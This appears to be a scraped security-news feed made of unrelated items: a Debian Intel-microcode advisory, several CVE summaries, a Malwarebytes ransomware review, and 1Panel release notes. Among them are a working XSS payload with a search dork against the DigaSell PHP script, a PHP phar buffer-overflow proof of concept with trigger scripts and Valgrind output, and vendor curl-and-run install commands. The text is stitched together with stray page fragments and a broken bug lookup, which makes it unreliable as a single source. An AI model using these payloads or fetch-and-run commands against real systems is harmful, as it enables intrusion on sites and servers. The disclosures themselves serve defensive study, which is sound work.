Debian Linux Security Advisory 5474-1 - This update ships updated CPU microcode for some types of Intel CPUs and provides mitigations for security vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5474-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 11, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : intel-microcode  
CVE ID         : CVE-2022-40982 CVE-2022-41804 CVE-2023-23908  
Debian Bug     : 1043305

This update ships updated CPU microcode for some types of Intel CPUs and  
provides mitigations for security vulnerabilities.

CVE-2022-40982

    Daniel Moghimi discovered Gather Data Sampling (GDS), a hardware  
    vulnerability which allows unprivileged speculative access to data  
    which was previously stored in vector registers.

    For details please refer to  
    <https://downfall.page/> and  
    <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/gather-data-sampling.html>.

CVE-2022-41804

    Unauthorized error injection in Intel SGX or Intel TDX for some  
    Intel Xeon Processors which may allow a local user to potentially  
    escalate privileges.

CVE-2023-23908

    Improper access control in some 3rd Generation Intel Xeon Scalable  
    processors may result in an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 3.20230808.1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 3.20230808.1~deb12u1.

We recommend that you upgrade your intel-microcode packages.

For the detailed security status of intel-microcode please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/intel-microcode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTV0BxfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RzLg//VXN+boskHdyaumxfcvnUf6pTh6ebU05fxKID1YmhXN155xmXDrVqkvvs  
5+qbGrNJUc89Ix2sLp/GlxC3sve4pnFe8jix/GrEN1bvc+bvDC565E6Ragcey1b+  
nB0viJZmhraXfB7VMjhlXG7Q2xxkXAYaJ5F3pvv2AWZt8/9P7We9KdQzxRpPXZSj  
0e5yVzRjo1elv2Mm6yDFNFXGc+dIxoBROSo7/6hIkPGtQyKMYdSYYmWJFQdf+szU  
4Z0lsFOGA6d1cri+I4RlxfsY3zIjZWANiKg7lR7dUzSO4q6j857zDHle2vpw5sTX  
kzXKID0am4dItKPH/gcX9lv5J8ozD2LMeebnUTmvOvBdAiVS1an5a2MI9TBo8VzL  
zdTqzwmQQHIjVY3mqVGnFupc5uxx2HStkMKHYXGyXOAapg2AecUDZrbD6rcg5kxY  
/CpSss3KHEpu8WosOCkYWhAbXOA7s6Wv6pZZ/qBtrjma2QwYK9dACL6Y2hRDIlEj  
e9X6fqc6Vqw0zosuenbnxypFJF27428Ev0ZOYKc9EdyxIVixAo2x5OnwOLyzpqaM  
f0X2DSyjCAc3zS+zxMpbRMtM8kCmz5V68RYWCzKBAZNsOmi2kWK7pkuaP1j9BEYB  
H/bo69fugJOSJppKi8GLwAnxLd7NqEXl6SBFP8CDfZJ9Rq8P1P4=  
=FLgQ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5474-1

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 



**Summary**

Buffer mismanagement in phar_dir_read() causes a buffer overflow and a buffer overread later.

**Details**

https://github.com/php/php-src/blob/be71cadc2f899bc39fe27098042139392e2187db/ext/phar/dirstream.c#L89C1-L116

There are few issues here:

*   The if check to_read == 0 || count < ZSTR_LEN(str_key) is not right.  
    In particular, if this is false we know that count >= ZSTR_LEN(str_key).  
    Furthermore, because of to_read = MIN(ZSTR_LEN(str_key), count); we now actually have: to_read == ZSTR_LEN(str_key).  
    If we have a filename length (i.e. ZSTR_LEN(str_key)) equal to sizeof(php_stream_dirent), then we get ZSTR_LEN(str_key) == count == to_read == sizeof(php_stream_dirent).
    
    Take a look now at this line: ((php_stream_dirent *) buf)->d_name[to_read + 1] = '\0';.  
    Assume sizeof(php_stream_dirent) is 4096 like on most Linuxes. Then we write at offset 4097, which is two bytes outside of buf.  
    This line was actually supposed to use to_read instead of to_read + 1, because now even if it doesn't overflow, it does not properly NUL-terminate the filename. We're just lucky there's a memset above.  
    Correcting that to use to_read doesn't solve the whole problem: it would still overflow because it will write at offset 4096 which is still outside buf.
    
    This means we have a stack information leak and a buffer write overflow.
    
*   Both the memset and the return value assume that count == sizeof(php_stream_dirent).  
    In principle if there are any callers where that count is smaller, a buffer overflow occurs in the memset.  
    However, inside PHP itself I did not find any such caller, but this may be a concern for third-party extensions.
    

**PoC**

I created a reproducer using PHP-8.0 with these configure flags: ./configure --enable-debug --disable-all --enable-phar --with-valgrind using compiler gcc (GCC) 13.1.1 20230429.

Create the malicious Phar file using:

<?php
$phar = new Phar('myarchive.phar');
$phar\->startBuffering();
$phar\->addFromString(str\_repeat('A', PHP\_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar\->stopBuffering();
?>

Trigger the buffer overflow and overread using this script:

<?php
$handle = opendir("phar://./myarchive.phar");
$x = readdir($handle);
closedir($handle);

var\_dump($x);
?>

If you run this in Valgrind, i.e. valgrind ./sapi/cli/php trigger.php you'll find two Valgrind complaints:

    ==42575== Conditional jump or move depends on uninitialised value(s)
    ==42575==    at 0x4847ED8: strlen (vg_replace_strmem.c:501)
    ==42575==    by 0x53BE9C: zif_readdir (dir.c:389)
    ==42575==    by 0x6D05C4: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==42575==    by 0x742F7D: execute_ex (zend_vm_execute.h:55163)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    ==42575==    by 0x788A53: do_cli (php_cli.c:949)
    ==42575==    by 0x789ADB: main (php_cli.c:1337)
    ==42575== 
    ==42575== Syscall param write(buf) points to uninitialised byte(s)
    ==42575==    at 0x4AA2BC4: write (write.c:26)
    ==42575==    by 0x7875EA: sapi_cli_single_write (php_cli.c:261)
    ==42575==    by 0x78768D: sapi_cli_ub_write (php_cli.c:293)
    ==42575==    by 0x611034: php_output_op (output.c:1082)
    ==42575==    by 0x60F2B7: php_output_write (output.c:261)
    ==42575==    by 0x5B3B0D: php_var_dump (var.c:120)
    ==42575==    by 0x5B432A: zif_var_dump (var.c:218)
    ==42575==    by 0x6D031A: ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1234)
    ==42575==    by 0x742F6D: execute_ex (zend_vm_execute.h:55159)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    

The first complaint is because the strlen() function overreads the d\_name buffer because it isn't properly NUL-terminated.  
The second one is because it writes the name using var\_dump, and the name contains (uninitialized) stack data.  
Valgrind won't complain about the stack buffer write overflow, but you can inspect the memory using gdb for example that a piece of the stack gets overwritten.

**Impact**

Exploiting this is difficult to do and heavily depends on the application you're targetting, but possible in theory I think using a combination of stack info leaks and buffer write overflows. People who inspect contents of untrusted phar files could be affected.

CVE-2023-3824: Buffer overflow and overread in phar_dir_read()

Improper access control in the Intel(R) Ethernet Controller RDMA driver for linux before version 1.9.30 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVE-2023-25775

Uncontrolled search path element for some Intel(R) Server Board M10JNP2SB integrated BMC video drivers before version 3.0 for Microsoft Windows and before version 1.13.4 for linux may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE-2023-34355

Uncontrolled search path element in some Intel(R) Quartus(R) Prime Pro and Standard edition software for linux may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE-2023-24016

Categories: Threat Intelligence
July saw one of the highest number of ransomware attacks in 2023 at 441. At the forefront of these attacks is, once again, Cl0p.



(Read more...)




The post Ransomware review: August 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

July saw one of the highest number of ransomware attacks in 2023 at 441, second only to a record-breaking 556 attacks in May. At the forefront of these attacks is, once again, Cl0p.

In June, Cl0p shot to the top of the charts due to their use of a zero-day exploit in MOVEit Transfer, and the story in July is no different. Using the same vulnerability, the gang attacked an additional 170 victims in July—the second highest number of attacks by a single gang all year, just two shy of MalasLockers' record in May.

Amidst all the Cl0p chaos, however, a familiar foe seems to be quietly waning: LockBit.

Known ransomware attacks by gang, July 2023

The LockBit gang is experiencing a steady four-month decline in the number of attacks it has carried out. Since April 2023, we’ve observed an average decrease of 20 attacks a month from the group. LockBit’s 107 attacks in April to 41 in July represents a 62 percent dip in activity.

We’ve seen a similar pattern from LockBit before, and it’s not unusual for ransomware gang activity to ebb and flow. Still, it’s worth mentioning that a suspected LockBit affiliate was arrested last month. At least LockBit’s July numbers, then, could be explained by them simply wanting to lay low for a bit.

When another LockBit suspected affiliate was arrested in November 2022, we also saw a similar historic low in activity from the group.

**"Big game hunting" numbers**

Research published in July by Chainanalysis showed that ransomware gangs raked in around $449 million from victims in the last six months. The driving force behind this huge number? Chainanalysis says it is “big game hunting.” the practice of targeting large, financially well-off corporations in order to secure the biggest possible payouts.

Chainanalysis also mentions an increase in payouts less than $1000, meaning smaller companies are still being targeted by ransomware gangs as well.

At around this same time last year, total payouts were slightly under $300 million—a difference of over $150 million.

One possible reason for this increase, says Chainanalysis, could be that because fewer and fewer firms are willing to pay the ransom, ransomware gangs are increasing the size of their ransom demands, the idea being to squeeze the most money possible out of the firms still willing to pay.

Malwarebytes' own data suggests that the increase in payouts could also be a simple consequence of there being more ransomware attacks in general. From March 2022 to July 2022, Malwarebytes recorded a total of 1,140 ransomware attacks. From March 2023 to July 2023, we recorded a total of 2,130.

Likely, there’s a combination of factors at play here. Our logic goes as follows:

> Bigger targets + greedier gangs + more ransomware attacks in general = Historically high payouts.

Known ransomware attacks by country, July 2023

Attacks on the US and UK are at a four-month high. Four-mouth trends on attacks in Italy, on the other hand, suggest that the country is a new regular in the monthly "Top Five" of most-attacked countries.

Known ransomware attacks by industry sector, July 2023

In an article published in October of last year, we speculated on the future evolution of ransomware and how, with the rise of double-extortion schemes, more and more gangs might pivot away from using encryptors entirely. Interestingly, new research last month by Huntress seems to support this idea—exemplified by the most active ransomware gang today no less.

In their massive zero-day exploitation sprees, **Cl0p has apparently not deployed ransomware at all**. Instead, the group has focused on simply stealing company data to then later use as leverage against victims.

This move represents a significant departure from the majority of top ransomware gangs, and it forces organizations to rethink the nature of the problem: i’s not about ransomware per se, it’s about an intruder in your network. The really dangerous thing is turning out to be the access, not the ransomware software itself. 

Cl0p's focus on exploiting zero-days for initial access is revolutionary on its own. Pairing this with a pure data-exfiltration approach could signal an even bigger paradigm shift in how ransomware gangs operate into the future.

Speaking of innovations from top gangs, last month ALPHV was observed offering an API for their data leak site. 

The new API is a conduit for swift data dissemination, helping other cybercriminals instantly access and distribute the stolen information on the dark web. The overarching goal here —especially considering that ALPHV failed to seek a ransom from recently-breached cosmetics company Estee Lauder—seems to be to pressure victims to pay as stolen data reaches wider audiences.

Time will tell if the move pays off, but if nothing else, it signals cybercriminal desperation amid declining ransomware payments.

**New players****CATCUS **

CACTUS emerged in March 2023 as a fresh strain of ransomware, zeroing in on large-scale commercial operations. Last month, they published 18 victims on their leak site.

To infiltrate systems, this gang exploits well-known vulnerabilities present in VPNs. Once CACTUS operatives gain access to a network, they enumerate local and network user accounts and reachable endpoints. Following this, they craft new user accounts and deploy their ransomware encryptor. The uniqueness of CACTUS lies in their use of specialized scripts that automate the release and activation of the ransomware through scheduled tasks.

The CACTUS leak site

**Cyclops/Knight **

Though the underworld caught wind of Cyclops in May 2023, it's only recently that evidence of their activities surfaced as new victims' details appeared on their dark web portal. In addition, they've announced a shift in branding to "Knight." Last month, they published 6 victims on their leak site.

This ransomware is versatile, capable of compromising Windows, Linux, and macOS systems alike. Cyclops stands out with its intricate encryption methodology, which mandates a unique key to decrypt the execution binary. Cyclops also comes equipped with a distinct stealer component designed to extract and transfer sensitive information.

The Cyclops/Knight leak site

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: August 2023

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, an arbitrary file write vulnerability could lead to direct control of the server. In the `api/v1/file.go` file, there is a function called `SaveContentthat,It `recieves JSON data sent by users in the form of a POST request. And the lack of parameter filtering allows for arbitrary file write operations. Version 1.5.0 contains a patch for this issue.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 新特性**

*   【网站】支持 PHP 运行环境类型网站切换版本。 by @zhengkunwang223 in #1748
*   【网站】支持网站设置重定向。 by @zhengkunwang223 in #1731
*   【数据库】支持添加 MySQL 远程数据库。 by @ssongliu in #1744
*   【主机】增加进程守护管理。 by @zhengkunwang223 in #1786

**2.2 功能优化**

*   【网站】网站设置 IPv6 功能优化。 by @zhengkunwang223 in #1732
*   【网站】网站防盗链页面样式优化。 by @zhengkunwang223 in #1807
*   【网站】网站设置页面添加反向代理时支持用户选择传输协议。 by @zhengkunwang223 in #1832
*   【网站】编辑 PHP 运行环境后增加关联应用重建的提示信息。 by @zhengkunwang223 in #1896
*   【应用商店】应用升级时增加备份选项。 by @zhengkunwang223 in #1750
*   【应用商店】已安装应用列表增加 HTTPS 类型端口的跳转功能。 by @zhengkunwang223 in #1870
*   【应用商店】全部应用和已安装应用列表页面样式优化。 by @zhengkunwang223 in #1895
*   【应用商店】应用依赖 Redis 时，创建页面自动填充 Redis 密码。 by @zhengkunwang223 in #1826
*   【数据库】数据库密码校验规则优化。 by @ssongliu in #1815
*   【数据库】数据库连接信息样式优化。 by @ssongliu in #1857
*   【容器】容器创建页面部分字段翻译优化。 by @SkyAerope in #1797
*   【主机】文件列表记录文件浏览器最后一次访问的路径。 by @zhengkunwang223 in #1753
*   【主机】文件列表页面适配移动端。 by @wangdan-fit2cloud in #1730
*   【主机】监控页面调整数据默认采集间隔和保存时间。 by @ssongliu in #1795
*   【面板设置】创建系统快照前停止所有定时任务。 by @ssongliu in #1888
*   【面板设置】服务器地址支持设置域名。 by @ssongliu in #1778
*   【面板设置】备份账号页面部分按钮样式优化。 by @ssongliu in #1893
*   【面板设置】创建快照逻辑优化。 by @ssongliu in #1805
*   【系统】登录页增加切换语言选项。 by @zhengkunwang223 in #1752
*   【系统】部分页面样式适配移动端。 by @wangdan-fit2cloud in #1891
*   【系统】移除不必要的 SSH Session 连接。 by @LeeEirc in #1780
*   【系统】部分页面分页排序样式优化。 by @ssongliu in #1821
*   【系统】创建抽屉页面不再动态显示名称。 by @ssongliu in #1777

**2.3 问题修复**

*   【网站】修复了部分场景下创建 PHP 运行环境异常的问题。 by @zhengkunwang223 in #1882
*   【应用商店】修复了应用升级后无法编辑最新配置的问题。 by @zhengkunwang223 in #1824
*   【应用商店】修复了更新应用列表后可能出现多个同名应用的问题。 by @zhengkunwang223 in #1827
*   【应用商店】修复了 Cloudreve 升级后数据丢失的问题。 by @zhengkunwang223 in #1822
*   【应用商店】修复了编辑应用时关闭高级设置之后没有提示端口放开的问题。 by @zhengkunwang223 in #1887
*   【应用商店】修复了安装应用时数据库密码包含 & $ 等特殊字符时提示错误的问题。 by @zhengkunwang223 in #1809
*   【数据库】修复了数据库日志监听未刷新的问题。 by @ssongliu in #1823
*   【容器】修复了编辑容器时不显示手动挂载的挂载卷的问题。 by @ssongliu in #1783
*   【容器】修复了编辑容器时由于端口冲突导致容器被删除的问题。 by @ssongliu in #1770
*   【主机】修复了文件压缩时无法选择文件夹的问题。 by @zhengkunwang223 in #1802
*   【主机】修复了当 SSH 登录日志涉及多个年份时导致数据异常的问题。 by @ssongliu in #1785
*   【面板设置】修复了同步快照路径错误的问题。 by @ssongliu in #1863
*   【系统】修复了系统安装在根目录时导致升级失败的问题。 by @ssongliu in #1776

**2.4 应用商店**

*   新增 JumpServer。 by @wojiushixiaobai in 1Panel-dev/appstore#238
*   新增 SFTPGo。 by @wanghe-fit2cloud in 1Panel-dev/appstore#269
*   新增 PGAdmin4。 by @wojiushixiaobai in 1Panel-dev/appstore#246
*   新增 frp。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Discuz。 by @okxlin in 1Panel-dev/appstore#227
*   新增 Nextcloud。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Domain Admin。 by @mouday in 1Panel-dev/appstore#278
*   新增 emlog。 by @emlog in 1Panel-dev/appstore#276
*   新增 ZFile。 by @okxlin in 1Panel-dev/appstore#299
*   新增 MeiliSearch。 by @CyJaySong in 1Panel-dev/appstore#219
*   新增 ChatGPT Web。 by @okxlin in 1Panel-dev/appstore#274
*   新增 Home Assistant。 by @okxlin in 1Panel-dev/appstore#299
*   AdGuardHome 版本升级至 v0.107.36。 by @renovate in 1Panel-dev/appstore#293
*   OpenResty 版本升级至 1.21.4.2-0。 by @wuhang2003 in 1Panel-dev/appstore#300
*   Tailchat 版本升级至 v1.8.8。 by @renovate in 1Panel-dev/appstore#305
*   青龙 版本升级至 v2.16.0。 by @renovate in 1Panel-dev/appstore#306
*   ddns-go 版本升级至 v5.6.0。 by @renovate in 1Panel-dev/appstore#307
*   Memos 版本升级至 v0.14.3。 by @renovate in 1Panel-dev/appstore#304
*   Jenkins 版本升级至 v2.418。 by @renovate in 1Panel-dev/appstore#312
*   Cloudreve 版本升级至 v3.8.2。 by @renovate in 1Panel-dev/appstore#308
*   Alist 版本升级至 v3.25.1。 by @renovate in 1Panel-dev/appstore#309

**2.5 安全更新**

*   修复了部分文件接口存在任意文件读取漏洞的问题。 (CVE-2023-39964)
*   修复了部分文件接口存在任意文件下载漏洞的问题。 (CVE-2023-39965)
*   修复了部分文件接口存在任意文件写入漏洞的问题。 (CVE-2023-39966)

CVE-2023-39966: Release v1.5.0 · 1Panel-dev/1Panel

A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.

'2225511?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

Tag

#linux